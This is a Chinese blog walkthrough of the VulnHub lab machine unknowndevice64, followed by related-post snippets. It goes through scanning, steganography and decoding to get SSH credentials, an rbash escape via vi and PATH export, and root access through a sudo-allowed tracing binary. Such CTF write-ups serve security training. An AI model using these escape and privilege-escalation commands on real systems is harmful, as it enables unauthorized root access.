unknowndevice64-V1.0靶机

于 2024-08-09 23:16:30 发布
阅读量104 收藏 3
点赞数 4
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zdd1453691081/article/details/141072804
版权

信息收集:

靶机地址:https://www.vulnhub.com/entry/unknowndevice64-1,293/

(1)ip扫描

nmap 192.168.254.0/24 -sn | grep -B 2 '00:0C:29:D1:FC:88'

(2)端口扫描

nmap -p- -A 192.168.254.149
开放端口:1337(ssh)、31337(http)

(3)目录扫描

dirb http://192.168.254.149:31337/

(4)访问31337端口,没什么发现

(5)f12查看源码,发现有一个图片 key_is_h1dd3n.jpg

(6)访问图片,上面写着 隐藏的秘密,可能是图片隐写

(7)将图片下载下来,在kali中使用 steghide 工具提取信息

sudo apt-get update
sudo apt-get install steghide
steghide extract -sf key_is_h1dd3n.jpg

(8)显示需要密码,根据名字可以知道密码为 h1dd3n,得到一个h1dd3n.txt

(9)查看文件内容,是 brainfuck 加密

(10)使用工具解密,得到账号密码

ud64:1M!#64@ud

getshell:

(1)登录ssh

ssh ud64@192.168.254.149 -p 1337
1M!#64@ud

(2)发现很多命令被限制,是rbash的shell,双击tab键,查看可执行命令

(3)vi 和 export 命令可用,vi 绕过,还是有部分命令无法执行

vi
按shift+:
!/bin/bash

(4)export 配置环境变量绕过

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

提权:

(1)sudo -l,查看当前权限

(2)sysud64 可以执行 root 权限的命令,直接尝试提权

sudo sysud64

(3)失败了,sysud64 -h 查看帮助,

sudo sysud64 -h

(4)可以使用

-o file        send trace output to FILE instead of stderr

(5)尝试提权,提权成功

sudo sysud64 -o /dev/null /bin/bash

阿卡丽的神秘铺子
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
靶机渗透—unknowndevice64
ray_kong的博客
04-04 4430
渗透unknowndevice64下载地址渗透IP扫描端口扫描http端口访问ssh端口访问rbash逃逸提权 下载地址 download unknowndevice64 地址:https://www.vulnhub.com/entry/unknowndevice64-1,293/ 渗透 IP扫描 sudo arp-scan -l //确定靶机IP地址 扫描到的靶机IP地址是 192.168.10.129 端口扫描 sudo nmap -p- 192.168.10.129 //靶机开放端口 sud
Vulnhub靶机实战——Matrix2
冠霖L的博客
11-10 1181
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Matrix2靶机IP地址: 192.168.220.159 Kali的IP地址: 192.168.220.155 Matrix2靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.1...
unknowndevice64-V1.0靶机渗透测试
m0_64769218的博客
09-17 199
打开之后的文件信息为一种brainfuck的程序语言,使用在线工具https://copy.sh/brainfuck/,或者https://www.splitbrain.org/services/ook在线解密后即可获取到ssh的用户名和密码;提示需要密码,图片名称为 key_is_h1dd3n,那么密码就是 h1dd3n,成功提取出了h1dd3n.txt;使用sudo-l查看sudo权限,发现可以无密码登录sysud64。使用sudo sysud64 -h查看帮助消息,发现可以使用。
unknowndevice64-V1.0
weixin_52953960的博客
08-09 62
显示需要密码,根据名字可以知道密码为 h1dd3n,得到一个h1dd3n.txt。发现很多命令被限制,是rbash的shell,双击tab键,查看可执行命令。sysud64 可以执行 root 权限的命令,直接尝试提权。访问图片,上面写着隐藏的秘密,可能是图片隐写。查看文件内容,是 brainfuck 加密。失败了,sysud64 -h 查看帮助。vi 绕过,还是有部分命令无法执行。f12查看源码,发现有一个图片。访问31337端口,没什么发现。export 配置环境变量绕过。使用工具解密,得到账号密码。
vulnhub系列:unknowndevice64-V1.0
jq_j37的博客
08-08 194
vulnhub系列:unknowndevice64-V1.0靶机,打靶文章
vulnhub之unknowndevice64-V1.0渗透实战
weixin_43862283的博客
04-15 475
vulnhub之unknowndevice64-V1.0渗透实战 0x01 环境及配置 难度:中级 目标:获取root权限并阅读/root/flag.txt 网络:桥接模式 DHCP自动分配IP地址 下载地址:https://mega.nz/#!WyQ1UaKC!azV9qvOXqzxOXFcE9qP15fQTEOWgr27plE0SmZTvGhk 靶机:192.168.34.152 攻击机:ka...
靶机渗透测试(unknowndevice64: 1)
@小张小张的博客
09-15 923
靶机渗透测试(unknowndevice64: 1): Vulnhub靶机 unknowndevice64: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(中等) 目标:成功渗透进入靶机,获取root权限并且读取/root/flag.txt 。 渗透流程: 1.探测主机ip(netdiscover -i eth0 -r 网关) 2.nmap进行靶机端口服务扫描 nmap -sS -Pn -A -p- -n 靶机ip 发现
Unknowndevice64
weixin_43841336的博客
07-18 343
1.查找主机和端口 Nmap -sP 192.168.34.1/24扫描存活主机,并确认靶机(192.168.34.152) nmap -sV -p0-65535 192.168.34.152查看开发端口 访问下31337端口,是一个网站,查看源代码 有一个jpg图片,访问并下载下来,用steghide --extract -sf key_is_h1dd3n.jpg -p h1dd3n将图片隐藏信...
VulnHub实战篇三:UD64靶机渗透记录
a1004070060的博客
04-08 363
0x01环境描述 靶机名称:unknowndevice64-1 下载地址:下载地址 攻击机ip:192.168.0.105 靶机ip:192.168.0.106(通过C段扫描获得) 渗透目标:提权至root并读取flag文件 0X02渗透过程 使用nmap扫描目标开放端口同时识别服务,使用命令如下。通过扫描我们发现了目标1337端口的http服务以及运行在31337端口的htt...
计算机硬件查看软件UnknownDevice
02-28
UnknownDevice对计算机的所有硬件进行查看,方便好用。
无法识别USB设备,解决Unknown Device_亲测 网上的方法都试遍了,就这个成功了!.zip
01-09
标签“unknowndevice”和“windows”表明问题主要发生在Windows系统中,与未知设备相关。Windows系统在无法找到适配的驱动程序或者驱动程序出现问题时,会将设备识别为未知设备。 根据压缩包内的文件名称,我们可以...
unknown device驱动下载_手机usb2.0万能驱动程序
09-29
unknown device驱动下载_手机usb2.0万能驱动程序
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8374
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
财务报表应付账款清单.xls
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
基于MATLAB车牌识别系统系统GUI面板.zip
最新发布
08-09
MATLAB车牌检测和识别系统可以用于自动识别车辆的车牌信息。以下是一个简单的实现步骤: 1. 车牌检测:使用图像处理技术来提取车牌区域。可以通过颜色、形状、纹理等特征来识别车牌区域。 2. 车牌字符分割:通过图像处理技术将车牌区域中的字符分割出来,形成单独的字符图像。 3. 字符识别:使用机器学习或深度学习算法来对字符图像进行识别。可以使用已有的字符数据集进行训练,或使用现有的字符识别模型进行预测。 4. 字符序列重组:将识别出的字符按照顺序重组,形成车牌号码。 5. 车牌信息输出:将识别出的车牌号码输出到目标文件或显示在屏幕上。 MATLAB提供了丰富的图像处理和机器学习工具箱,可以方便地实现车牌检测和识别系统。可以使用MATLAB中的图像处理函数、机器学习算法和深度学习框架来进行系统开发。同时,MATLAB还提供了图形界面工具,可以方便地设计用户界面,使系统更易于使用。
JAVA+SQL电子通讯录带系统托盘(论文+源代码).rar
08-09
1、安装jdk1.5.0 2、如果是B/S结构程序,请复制jakarta-tomcat-5.0.28这个文件夹下的 所有文件到你的E盘根目录下(不是固定的) 3、配置环境变量: (1)我的电脑—右键—属性—高级—环境变量—系统变量—新建,变量名:JAVA_HOME ,注意为大写,变量值:你所安装JDK的根目录,如:C:\Program Files\Java\jdk1.5.0; (2)我的电脑—右键—属性—高级—环境变量—系统变量—新建,变量名:CLASSPATH ,注意为大写,变量值:你所安装JDK的根目录下的lib文件夹,如:C:\Program Files\Java\jdk1.5.0\lib\tools.jar;.注意后面以分号和一个点结尾; (3)修改path变量:我的电脑—右键—属性—高级—环境变量—系统变量—选择path,点编辑,在变量名最后增加一个分号,增加你安装的JDK的根目录下的bin文件夹:C:\Program Files\Java\jdk1.5.0\bin; (4)如果是B/S结构程序,我的电脑—右键—属性—高级—环境变量—系统变量—新建,变量名:TOMCAT_HO
基于Springboot的养老院管理系统 Javaee项目,springboot项目
08-09
资源详情:https://blog.csdn.net/2302_78191516/article/details/141072272
财务单据-付款申请书.xls
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
怎么修复unknowndevice
09-11
### 回答1: Unknown Device是指电脑在设备管理器中无法识别的未知设备。修复方法有以下几种: 1. 更新驱动程序:右键点击未知设备,选择“更新驱动程序”,尝试使用Windows更新或手动下载并安装适用于该设备的驱动程序。 2. 卸载并重新安装设备:右键点击未知设备,选择“卸载设备”,然后重启电脑。重新插入设备后,电脑将重新识别设备并尝试重新安装驱动程序。 3. 使用设备厂商提供的驱动程序:从设备的官方网站下载并安装针对该设备的最新驱动程序。 4. 检查硬件连接:检查设备和电脑之间的连接是否正常,尝试更换电源线、USB线或其他连接线。 5. 检查设备是否损坏:尝试将设备连接到另一台电脑或设备上,如果该设备仍然无法被识别,可能是设备自身出现故障。 总之,无论哪种方法,都需要仔细分析并一步一步进行试验,以确定最终解决方案。求助专业技术人员可能会更快地解决问题。 ### 回答2: 修复"unknowndevice"的方法取决于具体情况。根据问题的描述,可能是指电脑或移动设备无法识别或识别不出某个设备的错误。 首先,我们可以尝试以下方法来修复这个问题: 1. 重新连接设备:断开设备连接并重新连接,确保连接线是否牢固连接,并将其插入正确的端口或插槽。 2. 重启设备:有时,设备或计算机的重启可以解决无法识别设备的问题。尝试重启设备并查看是否可以解决问题。 3. 更新驱动程序:在设备管理器中查找问题设备,右键点击它并选择"更新驱动程序"。如果有可用的更新,请下载并安装它们,然后重新连接设备。 4. 更新操作系统:确保你的操作系统是最新的版本。更新操作系统可能会修复某些设备不被识别的问题。 5. 使用其他USB端口或电缆:有时,设备无法被识别可能是由于破损的USB端口或电缆引起的。尝试使用不同的USB端口或更换电缆来确认问题所在。 如果以上方法都无效,可能需要采取以下额外措施: 1. 参考设备或计算机的说明手册:查看设备或计算机的手册,以了解更多关于如何识别和连接特定设备的信息。 2. 参考设备制造商的网站:访问设备制造商的官方网站,查找关于修复特定设备的文档、驱动程序或其他支持信息。 3. 寻求专业帮助:如果问题仍然存在,可能需要寻求专业技术支持的帮助。联系设备制造商、计算机技术支持专家或维修中心以获取更多指导。 总之,修复"unknowndevice"的关键是找出具体的原因,并采取相应的措施进行修复。根据具体设备和情况,可能需要尝试多种方法来解决问题。 ### 回答3: 修复 "unknowndevice" 的具体步骤会根据问题的性质和出现该问题的具体设备而有所不同。这是由于 "unknowndevice" 是一个比较宽泛的错误描述,可指示许多不同类型的问题。以下是一些可能的修复步骤: 1. 驱动程序更新:首先,尝试更新相关设备的驱动程序。可以通过设备管理器或设备官方网站下载和安装最新的驱动程序版本。如果驱动程序过时或损坏,可能会导致设备被识别为 "unknowndevice"。 2. 连接检查:检查设备与计算机之间的所有连接,并确保它们正确插入。有些 "unknowndevice" 错误可能是由于不良或不稳定的连接导致的。 3. 重新启动设备和计算机:有时,重新启动设备和计算机可以解决 "unknowndevice" 错误。关闭设备并从电源中断供电,然后重新启动计算机。然后再次连接设备并检查错误是否已解决。 4. 执行设备故障排除:某些操作系统中都有设备故障排除工具,可以帮助识别和修复设备问题。尝试按照操作系统故障排除流程的指导进行检查。 5. 重新安装设备:如果上述方法都无效,可以考虑卸载设备,并重新安装。这可以通过设备管理器中的 "卸载设备" 选项来完成。然后再次连接设备,系统将自动重新安装该设备。 总之,修复 "unknowndevice" 错误需要根据具体情况采取相应的措施。如果问题仍然存在,可能需要咨询专业技术人员或设备制造商以获取更多帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值